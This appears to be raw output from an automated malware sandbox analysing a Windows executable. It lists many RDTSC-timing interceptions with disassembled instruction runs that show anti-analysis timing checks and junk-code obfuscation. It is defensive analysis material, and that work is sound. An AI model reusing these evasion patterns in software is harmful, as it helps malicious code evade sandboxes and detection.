                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D67FB4 second address: D67FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7A9B5 second address: D7A9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7A9B9 second address: D7A9D9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2830CEE566h 0x00000008 jno 00007F2830CEE566h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2830CEE56Eh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7A86A second address: D7A89D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2830CF2D26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2830CF2D31h 0x0000000f pushad 0x00000010 jmp 00007F2830CF2D33h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7E887 second address: D7E8B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2830CEE571h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007F2830CEE574h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7E8B6 second address: D7E8BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7E8BA second address: D7E8C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7E8C4 second address: D7E8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7EA1A second address: D7EA20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7EA20 second address: D7EA24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7EA24 second address: D7EA4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE56Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F2830CEE57Ah 0x0000000f jmp 00007F2830CEE56Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7F0FC second address: D7F128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2830CF2D2Dh 0x0000000a push edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F2830CF2D32h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7F128 second address: D7F12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7F2A2 second address: D7F2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7F2A6 second address: D7F2B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F2830CEE566h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D839A2 second address: D83A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jng 00007F2830CF2D3Bh 0x0000000d jmp 00007F2830CF2D35h 0x00000012 nop 0x00000013 mov dx, CC10h 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F2830CF2D28h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 or dword ptr [ebp+122D370Fh], esi 0x00000039 mov dword ptr [ebp+122D1D13h], edx 0x0000003f call 00007F2830CF2D29h 0x00000044 push eax 0x00000045 push edx 0x00000046 js 00007F2830CF2D28h 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D83A0A second address: D83A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D83A10 second address: D83A2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D83A2B second address: D83A35 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2830CEE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D83A35 second address: D83A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F2830CF2D28h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D83CE7 second address: D83D7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2830CEE56Fh 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 jmp 00007F2830CEE575h 0x00000015 push dword ptr [ebp+122D1FD4h] 0x0000001b mov dword ptr [ebp+122D222Bh], esi 0x00000021 call 00007F2830CEE569h 0x00000026 pushad 0x00000027 jmp 00007F2830CEE573h 0x0000002c push edi 0x0000002d jmp 00007F2830CEE576h 0x00000032 pop edi 0x00000033 popad 0x00000034 push eax 0x00000035 push ebx 0x00000036 push ebx 0x00000037 push esi 0x00000038 pop esi 0x00000039 pop ebx 0x0000003a pop ebx 0x0000003b mov eax, dword ptr [esp+04h] 0x0000003f push eax 0x00000040 push edx 0x00000041 push edi 0x00000042 jmp 00007F2830CEE578h 0x00000047 pop edi 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D83D7F second address: D83DB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push edi 0x0000000c jnl 00007F2830CF2D28h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a jmp 00007F2830CF2D2Ah 0x0000001f pop ecx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D8570E second address: D85723 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007F2830CEE566h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F2830CEE574h 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C9B0D1 second address: C9B0D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50903AB second address: 50903F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE56Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2830CEE576h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov si, dx 0x00000014 mov ax, bx 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 jmp 00007F2830CEE56Fh 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 movsx edx, cx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50903F4 second address: 50903F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50903F9 second address: 509041B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE573h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov eax, 5CCFB361h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 509041B second address: 5090457 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2830CF2D2Eh 0x00000008 and ax, 21F8h 0x0000000d jmp 00007F2830CF2D2Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2830CF2D36h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50904D0 second address: 50904D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50904D6 second address: 50904DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0661 second address: 50B0698 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2830CEE56Dh 0x00000008 sbb ah, FFFFFFA6h 0x0000000b jmp 00007F2830CEE571h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2830CEE56Ch 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0698 second address: 50B069E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B069E second address: 50B06A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B06A2 second address: 50B06EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F2830CF2D2Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov bh, ah 0x00000016 pushad 0x00000017 mov edx, 67DE51ECh 0x0000001c popad 0x0000001d popad 0x0000001e xchg eax, ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F2830CF2D38h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B06EE second address: 50B06FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE56Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B06FD second address: 50B0702 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0702 second address: 50B0715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, si 0x00000010 push esi 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0715 second address: 50B0740 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F2830CF2D2Eh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0740 second address: 50B0746 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B0746 second address: 50B07BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2830CF2D2Bh 0x0000000f xchg eax, esi 0x00000010 jmp 00007F2830CF2D36h 0x00000015 lea eax, dword ptr [ebp-04h] 0x00000018 pushad 0x00000019 mov cl, 26h 0x0000001b mov cx, dx 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007F2830CF2D32h 0x00000025 mov dword ptr [esp], eax 0x00000028 jmp 00007F2830CF2D30h 0x0000002d push dword ptr [ebp+08h] 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 push ebx 0x00000034 pop eax 0x00000035 mov edi, 24E6008Ch 0x0000003a popad 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B08DA second address: 50B08DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B08DE second address: 50B08E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B08E4 second address: 50B08F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2830CEE56Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B08F5 second address: 50B08F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B08F9 second address: 50B092E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F2830CEE576h 0x00000012 and al, FFFFFFA8h 0x00000015 jmp 00007F2830CEE56Bh 0x0000001a popfd 0x0000001b mov edi, ecx 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50B092E second address: 50A01A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d sub esp, 04h 0x00000010 xor ebx, ebx 0x00000012 cmp eax, 00000000h 0x00000015 je 00007F2830CF2E8Ah 0x0000001b mov dword ptr [esp], 0000000Dh 0x00000022 call 00007F28352BF048h 0x00000027 mov edi, edi 0x00000029 jmp 00007F2830CF2D31h 0x0000002e xchg eax, ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01A0 second address: 50A01A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 233Ch 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01A9 second address: 50A01C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01C6 second address: 50A01CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01CA second address: 50A01CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01CE second address: 50A01D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01D4 second address: 50A01EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01EE second address: 50A01F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01F2 second address: 50A01F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01F6 second address: 50A01FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A01FC second address: 50A0240 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F2830CF2D2Dh 0x00000013 pushfd 0x00000014 jmp 00007F2830CF2D30h 0x00000019 xor eax, 460BDE48h 0x0000001f jmp 00007F2830CF2D2Bh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0240 second address: 50A02DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2830CEE56Fh 0x00000009 jmp 00007F2830CEE573h 0x0000000e popfd 0x0000000f mov di, cx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 sub esp, 2Ch 0x00000018 pushad 0x00000019 mov ebx, ecx 0x0000001b pushad 0x0000001c mov dx, ax 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 popad 0x00000023 xchg eax, ebx 0x00000024 jmp 00007F2830CEE572h 0x00000029 push eax 0x0000002a pushad 0x0000002b mov esi, edx 0x0000002d movsx edx, ax 0x00000030 popad 0x00000031 xchg eax, ebx 0x00000032 pushad 0x00000033 mov edx, ecx 0x00000035 mov ecx, 0F9910BDh 0x0000003a popad 0x0000003b xchg eax, edi 0x0000003c jmp 00007F2830CEE578h 0x00000041 push eax 0x00000042 jmp 00007F2830CEE56Bh 0x00000047 xchg eax, edi 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F2830CEE575h 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A02DD second address: 50A02E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A02E3 second address: 50A02E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0308 second address: 50A030E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A030E second address: 50A0312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0312 second address: 50A0382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d pushad 0x0000000e mov eax, 36CB2A1Bh 0x00000013 mov ecx, 5A684CF7h 0x00000018 popad 0x00000019 sub edi, edi 0x0000001b jmp 00007F2830CF2D33h 0x00000020 inc ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F2830CF2D2Bh 0x0000002a add ecx, 4169F62Eh 0x00000030 jmp 00007F2830CF2D39h 0x00000035 popfd 0x00000036 call 00007F2830CF2D30h 0x0000003b pop esi 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0382 second address: 50A03CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2830CEE56Eh 0x00000008 mov dx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test al, al 0x00000010 pushad 0x00000011 mov ah, FEh 0x00000013 pushfd 0x00000014 jmp 00007F2830CEE56Fh 0x00000019 jmp 00007F2830CEE573h 0x0000001e popfd 0x0000001f popad 0x00000020 je 00007F2830CEE6DCh 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A03CF second address: 50A03D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A03D3 second address: 50A03EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A03EE second address: 50A0439 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov bx, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c lea ecx, dword ptr [ebp-14h] 0x0000000f pushad 0x00000010 mov ecx, ebx 0x00000012 popad 0x00000013 mov dword ptr [ebp-14h], edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov ah, 83h 0x0000001b pushfd 0x0000001c jmp 00007F2830CF2D2Fh 0x00000021 xor si, 81BEh 0x00000026 jmp 00007F2830CF2D39h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A049C second address: 50A04A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A04A2 second address: 50A04A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A04A7 second address: 50A04F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE574h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F2830CEE570h 0x00000010 jg 00007F28A16EC521h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F2830CEE577h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A04F0 second address: 50A0539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F2830CF2D52h 0x0000000f pushad 0x00000010 movzx eax, dx 0x00000013 mov di, 6FDCh 0x00000017 popad 0x00000018 cmp dword ptr [ebp-14h], edi 0x0000001b jmp 00007F2830CF2D2Bh 0x00000020 jne 00007F28A16F0C97h 0x00000026 pushad 0x00000027 pushad 0x00000028 mov eax, 356061D1h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0539 second address: 50A0586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov ebx, dword ptr [ebp+08h] 0x00000009 jmp 00007F2830CEE579h 0x0000000e lea eax, dword ptr [ebp-2Ch] 0x00000011 jmp 00007F2830CEE56Eh 0x00000016 xchg eax, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F2830CEE577h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A0586 second address: 50A05E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2830CF2D31h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F2830CF2D2Ch 0x00000017 adc cx, A278h 0x0000001c jmp 00007F2830CF2D2Bh 0x00000021 popfd 0x00000022 mov ecx, 363D35AFh 0x00000027 popad 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50A05E2 second address: 50A05F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE573h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
